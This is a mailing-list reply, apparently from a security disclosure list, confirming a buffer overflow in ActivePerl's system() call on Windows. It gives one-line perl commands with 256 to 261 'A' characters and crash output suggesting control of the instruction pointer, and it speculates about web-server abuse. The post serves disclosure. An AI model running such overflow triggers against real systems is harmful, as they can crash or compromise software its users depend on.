[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Buffer Overflow in ActivePerl ?

"Oliver@xxxxxxxxxx" <Oliver@xxxxxxxxxx> wrote:

> i played around with ActiveState's ActivePerl for Win32, and crashed 
> Perl.exe with the following command:
> perl -e "$a="A" x 256; system($a)"

Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus 
all but last week's security patch:

   perl -e "$a="A" x 256; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x00657865.  The memory could not be "written".

Also, it is likely exploitable -- push up the number of A's a bit:

   C:\>perl -e "$a="A" x 259; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x65004141.  The memory could not be "written".

and we seem to get control of EIP.  Coincidence?  Try yet two more:

   C:\>perl -e "$a="A" x 261; system($a)"

   perl.exe - Application error

   Unhandled instruction at "0x77fcc83d" referenced memory at
   "0x41414141.  The memory could not be "written".

Looks like full control of EIP...

However, there is not likely to be a privilege escalation here unless 
perhaps a script processor on a web server can be cajoled into doing 
something with this??  (Not at all familiar with the innards of Windows 
web servers and their relationship to their CGI, etc processors...)

Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854